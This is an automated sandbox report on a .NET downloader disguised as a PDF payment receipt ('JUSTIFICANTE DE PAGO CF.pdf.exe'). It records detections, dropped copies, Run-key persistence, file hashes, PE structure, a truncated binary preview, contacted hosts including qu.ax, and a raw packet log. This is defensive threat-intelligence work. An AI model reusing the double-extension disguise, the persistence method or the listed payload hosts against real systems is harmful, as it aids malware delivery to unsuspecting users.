C:\Users\user\AppData\Roaming\Reramvw.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\Reramvw.exe | 34% | ReversingLabs |
C:\Users\user\AppData\Roaming\repeat\repeat.exe | 34% | ReversingLabs |

No Antivirus matches

No Antivirus matches

Source | Detection | Scanner | Label
https://sectigo.com/CPS0 | 0% | URL Reputation | safe
https://qu.axH | 0% | Avira URL Cloud | safe
https://qu.ax/HCHP.pdf | 0% | Avira URL Cloud | safe
https://qu.ax | 0% | Avira URL Cloud | safe
https://qu.axin | 0% | Avira URL Cloud | safe
http://wassadadvogados.com.br | 0% | Avira URL Cloud | safe
https://qu.ax4e | 0% | Avira URL Cloud | safe
http://mail.wassadadvogados.com.br | 0% | Avira URL Cloud | safe
https://qu.axen | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
wassadadvogados.com.br | 191.252.141.106 | true | false | | unknown
www.example.com | 93.184.216.34 | true | false | | high
qu.ax | 45.83.31.187 | true | false | | unknown
mail.wassadadvogados.com.br | unknown | unknown | true | | unknown

Name | Malicious | Antivirus Detection | Reputation
https://qu.ax/HCHP.pdf | false | Avira URL Cloud: safe | unknown
http://www.example.com/recepticle.aspx | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
93.184.216.34 | www.example.com | European Union | 15133 | EDGECASTUS | false
45.83.31.187 | qu.ax | Netherlands | 35913 | DEDIPATH-LLCUS | false
191.252.141.106 | wassadadvogados.com.br | Brazil | 27715 | LocawebServicosdeInternetSABR | false
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1396479
Start date and time: 2024-02-21 21:08:04 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 17s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 14
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: JUSTIFICANTE DE PAGO CF.pdf.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@17/7@3/3
                                                        EGA Information:
                                                        • Successful, ratio: 100%
                                                        HCA Information:
                                                        • Successful, ratio: 97%
                                                        • Number of executed functions: 235
                                                        • Number of non-executed functions: 2
                                                        Cookbook Comments:
                                                        • Found application associated with file extension: .exe
                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                        • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                        • VT rate limit hit for: JUSTIFICANTE DE PAGO CF.pdf.exe
Time | Type | Description
21:08:47 | API Interceptor | 96x Sleep call for process: JUSTIFICANTE DE PAGO CF.pdf.exe modified
21:08:53 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Reramvw C:\Users\user\AppData\Roaming\Reramvw.exe
21:09:02 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run repeat C:\Users\user\AppData\Roaming\repeat\repeat.exe
21:09:03 | API Interceptor | 158x Sleep call for process: Reramvw.exe modified
21:09:11 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Reramvw C:\Users\user\AppData\Roaming\Reramvw.exe
21:09:12 | API Interceptor | 141x Sleep call for process: repeat.exe modified
21:09:20 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run repeat C:\Users\user\AppData\Roaming\repeat\repeat.exe
                                                                              Process:C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):1342
                                                                              Entropy (8bit):5.356174099965624
                                                                              Encrypted:false
                                                                              SSDEEP:24:ML9E4KlKDE4KhKiKhPKIE4oKNzKoZAE4KzetfE4KhBE4KAE4KoE4Tye:MxHKlYHKh3oPtHo6hAHKzetfHKhBHKAX
                                                                              MD5:EC938B1E473862E00335136BF3BC55FE
                                                                              SHA1:EFD3018BF8CFB1E2AA47B4D8F8CC2A848A351B88
                                                                              SHA-256:323C1952255A753990FB610C303F4AF29CE622AECB64976A8F233FDEDFD5F537
                                                                              SHA-512:DC2D435FCEB877DB72F44BBBF7F3E825DB0E644E8B0C7D5779B857D3DEF1D71FF424B7D9731A4B3486144C26EB7DD78B54EA53C31031083B19FFF50989F4BC46
                                                                              Malicious:false
                                                                              Reputation:moderate, very likely benign file
                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..2,"System.ServiceModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.IdentityModel, Version=4.0.0.0, Culture=neutral,
                                                                              Process:C:\Users\user\AppData\Roaming\Reramvw.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):1342
                                                                              Entropy (8bit):5.356174099965624
                                                                              Encrypted:false
                                                                              SSDEEP:24:ML9E4KlKDE4KhKiKhPKIE4oKNzKoZAE4KzetfE4KhBE4KAE4KoE4Tye:MxHKlYHKh3oPtHo6hAHKzetfHKhBHKAX
                                                                              MD5:EC938B1E473862E00335136BF3BC55FE
                                                                              SHA1:EFD3018BF8CFB1E2AA47B4D8F8CC2A848A351B88
                                                                              SHA-256:323C1952255A753990FB610C303F4AF29CE622AECB64976A8F233FDEDFD5F537
                                                                              SHA-512:DC2D435FCEB877DB72F44BBBF7F3E825DB0E644E8B0C7D5779B857D3DEF1D71FF424B7D9731A4B3486144C26EB7DD78B54EA53C31031083B19FFF50989F4BC46
                                                                              Malicious:false
                                                                              Reputation:moderate, very likely benign file
                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..2,"System.ServiceModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.IdentityModel, Version=4.0.0.0, Culture=neutral,
                                                                              Process:C:\Users\user\AppData\Roaming\repeat\repeat.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):1342
                                                                              Entropy (8bit):5.356174099965624
                                                                              Encrypted:false
                                                                              SSDEEP:24:ML9E4KlKDE4KhKiKhPKIE4oKNzKoZAE4KzetfE4KhBE4KAE4KoE4Tye:MxHKlYHKh3oPtHo6hAHKzetfHKhBHKAX
                                                                              MD5:EC938B1E473862E00335136BF3BC55FE
                                                                              SHA1:EFD3018BF8CFB1E2AA47B4D8F8CC2A848A351B88
                                                                              SHA-256:323C1952255A753990FB610C303F4AF29CE622AECB64976A8F233FDEDFD5F537
                                                                              SHA-512:DC2D435FCEB877DB72F44BBBF7F3E825DB0E644E8B0C7D5779B857D3DEF1D71FF424B7D9731A4B3486144C26EB7DD78B54EA53C31031083B19FFF50989F4BC46
                                                                              Malicious:false
                                                                              Reputation:moderate, very likely benign file
                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..2,"System.ServiceModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.IdentityModel, Version=4.0.0.0, Culture=neutral,
                                                                              Process:C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):32256
                                                                              Entropy (8bit):5.568919273942432
                                                                              Encrypted:false
                                                                              SSDEEP:768:P0WhyGSUtsihJU1D81S4CBfwYzUppZ9/5W/jlaS:PbEF+sihJCD8Q9UppZ9/5W/jlaS
                                                                              MD5:5D9F0CA0E2B0E41F30A1CCE0B002484B
                                                                              SHA1:1EB77E3633DCFBFD2163A8E9A0C0A3F2588C0B14
                                                                              SHA-256:344BB8AE2D9AFBF9F666A844F6E9A7606EAA226A0383B84CF173F0F3725FABFF
                                                                              SHA-512:D78B1A5A55D16EB73E8D9D7CA2AE7925BAE7BC1F829C727B99DCF2E0725EECD831403AD8798572222B1D4963F9ABEAB1B0B8FFA3DC37C4636838254957388434
                                                                              Malicious:true
                                                                              Yara Hits:
                                                                              • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\Reramvw.exe, Author: Joe Security
                                                                              Antivirus:
                                                                              • Antivirus: Avira, Detection: 100%
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              • Antivirus: ReversingLabs, Detection: 34%
                                                                              Reputation:low
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....&.e.................t............... ........@.. ....................................`.....................................K.......`............................................................................ ............... ..H............text...4s... ...t.................. ..`.rsrc...`............v..............@..@.reloc...............|..............@..B........................H.......X^..|4...........................................................*...(....*..0..d....... ........8........E........M...q...8...4...........L...M.......x...z...8..... ....8....8.... ....~X...{-...:....& ....8......o....(...+.. ....8....*8.... ....~X...{....9e...& ....8Z....r...p(....t....o....t....o....s....o....& ....~X...{G...:....& ....8........E........8.....c...& ....~X...{P...:....& ....8........E........8.....,... ....8......:4... ....~X...{....9....& ....8.....
                                                                              Process:C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):26
                                                                              Entropy (8bit):3.95006375643621
                                                                              Encrypted:false
                                                                              SSDEEP:3:ggPYV:rPYV
                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                              Malicious:false
                                                                              Reputation:high, very likely benign file
                                                                              Preview:[ZoneTransfer]....ZoneId=0
                                                                              Process:C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):32256
                                                                              Entropy (8bit):5.568919273942432
                                                                              Encrypted:false
                                                                              SSDEEP:768:P0WhyGSUtsihJU1D81S4CBfwYzUppZ9/5W/jlaS:PbEF+sihJCD8Q9UppZ9/5W/jlaS
                                                                              MD5:5D9F0CA0E2B0E41F30A1CCE0B002484B
                                                                              SHA1:1EB77E3633DCFBFD2163A8E9A0C0A3F2588C0B14
                                                                              SHA-256:344BB8AE2D9AFBF9F666A844F6E9A7606EAA226A0383B84CF173F0F3725FABFF
                                                                              SHA-512:D78B1A5A55D16EB73E8D9D7CA2AE7925BAE7BC1F829C727B99DCF2E0725EECD831403AD8798572222B1D4963F9ABEAB1B0B8FFA3DC37C4636838254957388434
                                                                              Malicious:true
                                                                              Yara Hits:
                                                                              • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe, Author: Joe Security
                                                                              Antivirus:
                                                                              • Antivirus: Avira, Detection: 100%
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              • Antivirus: ReversingLabs, Detection: 34%
                                                                              Reputation:low
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....&.e.................t............... ........@.. ....................................`.....................................K.......`............................................................................ ............... ..H............text...4s... ...t.................. ..`.rsrc...`............v..............@..@.reloc...............|..............@..B........................H.......X^..|4...........................................................*...(....*..0..d....... ........8........E........M...q...8...4...........L...M.......x...z...8..... ....8....8.... ....~X...{-...:....& ....8......o....(...+.. ....8....*8.... ....~X...{....9e...& ....8Z....r...p(....t....o....t....o....s....o....& ....~X...{G...:....& ....8........E........8.....c...& ....~X...{P...:....& ....8........E........8.....,... ....8......:4... ....~X...{....9....& ....8.....
                                                                              Process:C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):26
                                                                              Entropy (8bit):3.95006375643621
                                                                              Encrypted:false
                                                                              SSDEEP:3:ggPYV:rPYV
                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                              Malicious:true
                                                                              Preview:[ZoneTransfer]....ZoneId=0
                                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                              Entropy (8bit):5.568919273942432
                                                                              TrID:
                                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                              • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                                              • DOS Executable Generic (2002/1) 0.01%
                                                                              File name:JUSTIFICANTE DE PAGO CF.pdf.exe
                                                                              File size:32'256 bytes
                                                                              MD5:5d9f0ca0e2b0e41f30a1cce0b002484b
                                                                              SHA1:1eb77e3633dcfbfd2163a8e9a0c0a3f2588c0b14
                                                                              SHA256:344bb8ae2d9afbf9f666a844f6e9a7606eaa226a0383b84cf173f0f3725fabff
                                                                              SHA512:d78b1a5a55d16eb73e8d9d7ca2ae7925bae7bc1f829c727b99dcf2e0725eecd831403ad8798572222b1d4963f9abeab1b0b8ffa3dc37c4636838254957388434
                                                                              SSDEEP:768:P0WhyGSUtsihJU1D81S4CBfwYzUppZ9/5W/jlaS:PbEF+sihJCD8Q9UppZ9/5W/jlaS
                                                                              TLSH:05E2180BB79A87A1D699873FC5E391400336D79BFB23D61E748AA34549037D8CA71783
                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....&.e.................t............... ........@.. ....................................`................................
                                                                              Icon Hash:00928e8e8686b000
                                                                              Entrypoint:0x40932e
                                                                              Entrypoint Section:.text
                                                                              Digitally signed:false
                                                                              Imagebase:0x400000
                                                                              Subsystem:windows gui
                                                                              Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                              Time Stamp:0x65D6260F [Wed Feb 21 16:34:23 2024 UTC]
                                                                              TLS Callbacks:
                                                                              CLR (.Net) Version:
                                                                              OS Version Major:4
                                                                              OS Version Minor:0
                                                                              File Version Major:4
                                                                              File Version Minor:0
                                                                              Subsystem Version Major:4
                                                                              Subsystem Version Minor:0
                                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                              Instruction
                                                                              jmp dword ptr [00402000h]
                                                                              add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x92e0 | 0x4b | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xa000 | 0x560 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xc000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x7334 | 0x7400 | fc5e6dd55c43dc18c48d401ca2a0bcc4 | False | 0.5141769935344828 | data | 5.70817919516591 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xa000 | 0x560 | 0x600 | c81d07d7c69b56629a05b8a5ccf50574 | False | 0.3990885416666667 | data | 3.9260486062024667 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xc000 | 0xc | 0x200 | 264f7c08371f1dde021d1643e85ab5cf | False | 0.044921875 | data | 0.08153941234324169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0xa0a0 | 0x2d4 | data | | | 0.43232044198895025
RT_MANIFEST | 0xa374 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                              Feb 21, 2024 21:08:49.562850952 CET49706443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:08:49.562872887 CET4434970645.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:08:49.562887907 CET49706443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:08:49.562916040 CET49706443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:08:49.649492979 CET4434970645.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:08:49.649514914 CET4434970645.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:08:49.649817944 CET49706443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:08:49.649840117 CET4434970645.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:08:49.649903059 CET49706443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:08:49.659795046 CET4434970645.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:08:49.659835100 CET4434970645.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:08:49.659977913 CET49706443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:08:49.660010099 CET4434970645.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:08:49.660068035 CET49706443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:08:49.675067902 CET4434970645.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:08:49.675092936 CET4434970645.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:08:49.675224066 CET49706443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:08:49.675224066 CET49706443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:08:49.675256968 CET4434970645.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:08:49.675308943 CET49706443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:08:49.682288885 CET4434970645.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:08:49.682307959 CET4434970645.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:08:49.682372093 CET49706443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:08:49.682382107 CET4434970645.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:08:49.682429075 CET49706443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:08:49.701539993 CET4434970645.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:08:49.701571941 CET4434970645.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:08:49.701742887 CET49706443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:08:49.701765060 CET4434970645.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:08:49.701811075 CET49706443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:08:49.718153000 CET4434970645.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:08:49.718184948 CET4434970645.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:08:49.718249083 CET49706443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:08:49.718266010 CET4434970645.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:08:49.718307018 CET49706443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:08:49.766819954 CET4434970645.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:08:49.766855955 CET4434970645.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:08:49.766971111 CET49706443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:08:49.766989946 CET4434970645.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:08:49.767035007 CET49706443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:08:49.772722960 CET4434970645.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:08:49.772743940 CET4434970645.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:08:49.772839069 CET49706443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:08:49.772846937 CET4434970645.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:08:49.772881985 CET49706443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:08:49.772891998 CET49706443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:08:49.777043104 CET4434970645.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:08:49.777072906 CET4434970645.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:08:49.777173996 CET49706443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:08:49.777182102 CET4434970645.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:08:49.777232885 CET49706443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:08:49.786035061 CET4434970645.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:08:49.786056995 CET4434970645.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:08:49.786135912 CET49706443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:08:49.786144972 CET4434970645.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:08:49.786189079 CET49706443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:08:49.794589996 CET4434970645.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:08:49.794610977 CET4434970645.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:08:49.794681072 CET49706443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:08:49.794692039 CET4434970645.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:08:49.794720888 CET49706443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:08:49.794732094 CET49706443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:08:49.797440052 CET4434970645.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:08:49.797465086 CET4434970645.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:08:49.797506094 CET49706443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:08:49.797516108 CET4434970645.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:08:49.797548056 CET49706443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:08:49.797561884 CET49706443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:08:49.800789118 CET4434970645.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:08:49.800818920 CET4434970645.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:08:49.800977945 CET49706443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:08:49.800987005 CET4434970645.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:08:49.801027060 CET49706443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:08:49.805978060 CET4434970645.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:08:49.806000948 CET4434970645.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:08:49.806149960 CET49706443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:08:49.806181908 CET4434970645.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:08:49.806232929 CET49706443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:08:49.849323034 CET4434970645.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:08:49.849350929 CET4434970645.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:08:49.849611998 CET49706443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:08:49.849643946 CET4434970645.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:08:49.849703074 CET49706443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:08:49.861449003 CET4434970645.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:08:49.861473083 CET4434970645.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:08:49.861530066 CET49706443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:08:49.861540079 CET4434970645.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:08:49.861556053 CET49706443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:08:49.861576080 CET49706443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:08:49.870224953 CET4434970645.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:08:49.870255947 CET4434970645.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:08:49.870301008 CET49706443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:08:49.870309114 CET4434970645.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:08:49.870338917 CET49706443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:08:49.870347023 CET49706443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:08:49.873627901 CET4434970645.83.31.187192.168.2.5
